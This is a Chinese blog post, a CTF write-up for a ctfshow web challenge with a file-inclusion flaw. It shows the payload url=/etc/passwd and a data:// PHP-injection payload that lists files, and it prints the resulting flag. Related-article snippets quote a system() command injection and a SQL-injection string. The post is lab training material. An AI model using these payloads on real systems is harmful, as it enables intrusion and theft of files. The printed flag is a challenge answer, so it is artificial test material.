CTF_ctfshow更简单的web题

最新推荐文章于 2023-09-23 23:05:53 发布
最新推荐文章于 2023-09-23 23:05:53 发布
阅读量201 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/124759631
版权

打开靶机,发现为文件包含,变量为url

直接先试一下能不能读取到靶机的文件url=/etc/passwd

 发现可以读

文件包含用五种常用的php为协议:

 (47条消息) 五种常见的php伪协议_浪_zi的博客-CSDN博客_php伪协议

这位师傅的博客中讲的很清楚,可以去看看

我们这里用的是data://text/plain,<?php ?>伪协议

1、直接执行php代码,查看当前目录下有哪些文件,构造payload

url=data://text/plain,<?php print_r(glob("*"));?>

发现当前目录下有ctf_go_go_go文件

前面可以读/etc/passwd

故直接查看文件

url=ctf_go_go_go

 

ctfshow{9d8a9a64-e94b-4d3f-929b-9e484a4de2eb}

解释:

url=data://text/plain,<?php print_r(glob("*"));?>

<?php print_r(glob("*"))?>

print_r(glob("*")):利用通配符*,读取当前文件下的所有文件,并打印出来

鸡肋是鸡肋!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次很简单web——CTFshow-WEB(1-4)
世间繁华梦一出
01-21 1008
CTFshow之Webweb1WEB2—SQL注入WEB3—php文件包含 web1 签到,直接查看网页源代码,发现注释中有一串字符 ZmxhZ3s1NDliMDkyYi0yYzkwLTQ1MTktYmY5OC05YTg0MmI4MTdkODV9 将此字符串进行base64解码即可得到flag WEB2—SQL注入 目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin'or 1=1# 之后发现有回显,说明存在sql注入,且用户名是ctfshow 接下来进行order by 判断字段数
ctfshow--web入门目1-20
weixin_50888622的博客
11-16 1707
web-1 where is flag? 此直接点击F12,查看其源代码就可以找到flag ctfshow{1121142c-011b-43e7-9268-7bc9b5024a75} 2.web-2无法查看源代码: 从多工具里面有一个开发人员工具,打开点击索引就可以找到flag ctfshow{d73c7c81-36de-42e9-bbc5-13a9b2a80677} web-3 第一种方法:在打开链接后发现还是where is flag 通过F12,在网络里面的响应头里面发现了flag c.
web前端简单
weixin_34290352的博客
10-02 179
一、数据库的初始设置(设置好后,以下各种操作都是对XSCJ数据库操作) 1.打开MicrosoftSQLServerManagementStudio,连接本地SQLServer数据库引擎并登录,将XSCJ数据库附加到该服务器中。(4分) 2.按下表所示结构创建数据表,保存时命名为“XS_KC”,并设置“学号”列和“课程号”列为主键。(10分) 列名 ...
ctfshow web(1-6)刷
qidiandexiaowu
11-30 604
目录web2 最简单的SQL注入 web2 最简单的SQL注入 尝试用万能密码。 admin ' or 1=1= # 登陆成功。 大概知道了闭合符号是‘ 然后构造payload:1' order by 3 # 用了怎么也没有出现回显位。 后来请教了学长了,才知道数据库里没有1这个数据,所以我们要使用or 1=1 order by 4 #才行。 因为 or是一真即真。1=1为永真,所以才可以执行我们后面的语句。 还有另一种方法到后面再说。 抓包看一下 右击发送给repeater payload:use
【ctf.show-web
一纸荒芜的博客
03-21 2120
主要分享自己做的心得和积累,共勉之。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
原创贪吃蛇Web
08-07
本人原创贪吃蛇,可穿越自己身体、提供暂停键玩累了可以休息。积分越高蛇也就越大,适合新手把玩,js代码简单易懂加上黑色背景、白色小蛇显得格外动人。
ctfshow简单web1-15
qq_62984336的博客
03-10 927
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
CTF练习— —简单WEB练习,maxlength问
Jum的博客
11-09 3036
日常练脑,好久好久没有打CTF 了虽然不打但是不得不备,日常练脑,别生锈。 拿目 打开WEB环境是一个计算,输上答案,发现只能输1位数字,肯定是限制了。那么需要我们解除输入限制方可得到flag. 找思路 日常习惯F12, 追踪到被限制输入的input。发现果真是限制了以为我们修改一下。 解答 因为我们的答案是141三位,我们把maxlength修改为3。这样我们就可以输入答案了。 输入正确的答案后,点击验证得到flag。夺旗成功。 夺旗成功 输入正确格式的flag.
ctfshow 做 web 方向 web1~web10
Goodric的博客
05-29 1791
ctfshow 做 web 方向 —— web1 签到 打开环境,页面中就一句话:where is flag ? F12 查看源代码,注释中一串字符,猜测为 base64 编码。 base64 解码得 flag 。 —— —— web2 目描述:最简单的 sql 注入。 打开环境是一个登录界面。 注入点应该就是用户名、密码的位置了。 用户名和密码的提交方式为 post ,用 burp抓包,复制数据包到新建 txt 文件。然后用 sqlmap 直接爆数据。 爆数据库: python2 sqlm
Ctfshow web入门 phpCVE篇 web311-web315 详细解 全
最新发布
Jay17的博客
09-23 550
Ctfshow web入门 phpCVE篇 web311-web315 详细解 全
CTFShow web1-7——CTF秀WEB模块解思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解思路CTFShow web签到CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
CTF日记之web目(入门目)
sunleibaba的博客
01-22 929
CTF日记 今天的目是i春秋ctf中的:“百度杯”CTF比赛 2017 二月场 web 爆破-1 点击创建好的连接,发现网页: 简单的代码审计: 加载flag.php文件,获取hello参数,如果hello的参数中不能匹配到该正则表达式,,就会报错。该正则表达式的双//是分隔符,没什么具体的意义;^和$ 是开头和结尾的意思;\w表示的是a-z,A-Z和0-9,再加上_下划线符号,,也就是说除了这四类符号之外的符号出现,就会报错,可是我们发现flag.php中有.,所以,肯定不能将flag.php作为
CTF,web,faster
qq_42937520的博客
03-09 822
一、打开目 二、查看源代码 查看源代码未发现有用东西。 三、BP抓包 发现自动跳转到1ndex.php界面。 目faster,尝试从打开目界面开始抓包,去掉1ndex.php,点击go 四、得到Flag Susctf{faster_as_you_can} ...
学习笔记(ctfshow WEB
qq_51301115的博客
05-02 194
web签到 查看源码 将源码中的字符串使用base64解码 得到flag
ctfshow web签到
09-12
ctfshow-web中的"web签到"是其中的一道目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到有关。 此外,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值